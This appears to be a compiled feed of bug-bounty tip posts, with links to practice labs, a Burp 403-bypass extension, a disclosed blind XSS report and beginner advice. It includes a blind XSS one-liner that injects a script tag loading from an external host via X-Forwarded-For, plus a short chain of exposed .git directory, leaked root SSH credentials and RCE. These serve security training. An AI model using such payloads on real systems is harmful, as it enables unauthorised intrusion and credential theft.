URL://
1. https://hackxpert.com/labs/RXSS/GET/
2. https://hackxpert.com/labs/SXSS/
by @theXSSrat
More: 🧵1/n 👇
URL://
https://sourceforge.net/projects/owaspbwa/
It's a machine
Contains 9-10 different labs
by @owasp
More: 🧵6/n 👇
SourceForge
OWASP Broken Web Applications Project
Download OWASP Broken Web Applications Project for free. Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with…
Feel free to add more labs
Follow me for more resources related to cybersecurity
A Burp Suite extension to bypass 403 restricted directories.
By using PassiveScan (enabled by default), each 403 request will be automatically scanned by this extension, so just add it to Burp Suite and enjoy.
URL://
https://github.com/sting8k/BurpSuite_403Bypasser
Tags:
#cybersecurity #bugbounty #bugbountytip
Blind XSS in app.pullreport.com████████ via /reviews/ratings/{uuid}
URL://
https://hackerone.com/reports/1558010
Tags:
#cybersecurity #hacking #bugbounty #bugbountytips #infosec #cybersec #blind_xss #xss
HackerOne
HackerOne disclosed on HackerOne: Blind XSS in...
**Summary:**
Hi,
While researching PullRequest yesterday, I saw some "review" endpoints in web archive of "app.pullrequest.com"....
Bug Bounty Tips
Explanation: which tool you can use for whatever bug it is
Credit: Patrik
URL://
https://blog.it-securityguard.com/pbbt.png
Tags:
#cybersecurity #bugbounty #bugbountytips #hacking #security #offsec
How to find & access Admin Panel by digging into JS files… https://medium.com/@ratnadip1998/how-to-find-access-admin-panel-by-digging-into-js-files-282d89391a2d
~Pwning
1. Recon = Found log file: web/path/wget-log
2. Found server IP in the log file
3. Tested Server IP & Found .git dir: wget -m -I .git web/.git/
4. git status & found backup zip file
5. While reading files found: app/file.php disclosing SSH root Credentials
6. RCE
Awesome Write-Ups And POCs🌵
Link :🔗
https://resource.dr4cun0.com
#cybersecurity #hacking #bugbounty #bugbountytips #infosec
Look😃🔥
Guide for Beginners and Intermediates in Bug Bounty
- Learn HTML.
Learning HTML is needed because, as a bug bounty hunter, you need it when you are hunting on websites.
- Do a project on website development.
This will give you a good understanding of websites and how a website really works and functions.
By now you have a good understanding of websites.
- Learn and practice as much as you can on the OWASP Top 10; basically, it contains the top 10 trending vulnerabilities in the current year.
- Go and read bug reports:
This will give you an understanding of how you need to think as a bug bounty hunter: https://twitter.com/Aacle_/status/1556301856317788160?s=20&t=yw73u2K7J50lrkT_JwMCVg
As a hacker you need to think like a hacker; then you will be able to become a good and professional bug bounty hunter.
Now it's time to try in the real world, so register on a bug bounty program like HackerOne or Bugcrowd and choose a target: not just any target, but an organization in which you will have a great chance to find bugs in the beginning.
Now Best of Luck👍 & Work Hard
If you like this, then please share the channel link with your friends
https://t.me/updatedwithCybersecurity
Best Laptop/PC Specification for a Penetration Tester
#bugbounty #hacking #infosec #cybersecurity
Processor: It should have at least 6 cores and 8 threads
RAM: At least 8 GB of RAM, but I'll recommend 16 GB because you have to use different types of VMs on your laptop/PC
Storage: Give the most priority to an SSD because it is much faster than an HDD, and that's why it makes your PC fast
Graphics: At least a 2 GB graphics card is needed for processes like brute forcing.
If your PC has at least the above specification, then you are all set
Thank you For Reading 😃
You can join my telegram group if you want : https://t.me/bugbountyresources
Blind XSS In X-Forwarded-For Header #bugbounty
subfinder -d http://target.com | gau | bxss -payload '"><script src=https://hacker.xss.ht></script>' -header "X-Forwarded-For"
#bugbountytips #infosec #cybersecurity
If you love it, you can join my channel : https://t.me/bugbountyresources
Get Reverse Shell
Using Bash, Netcat (Windows & Kali), Netcat (without -e option), Python, Perl, PHP
Read For More
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet?source=post_page---------------------------
#cybersecurity #hacking #bugbounty #infosec #reverse_shell
Join My Telegram Group For More like This 🔥👍: https://t.me/bugbountyresources
Bypass 304 (Not Modified) #bugbountytip
Request :
GET /admin HTTP/1.1
Host: http://target.com
If-None-Match: W/"32-IuK7rSIJ92ka0c92kld"
➡Delete the "If-None-Match" header
➡Add a random character at the end of the "If-None-Match" header
Join Group For More:
https://t.me/bugbountyresources
#cybersecurity #hacking #bugbounty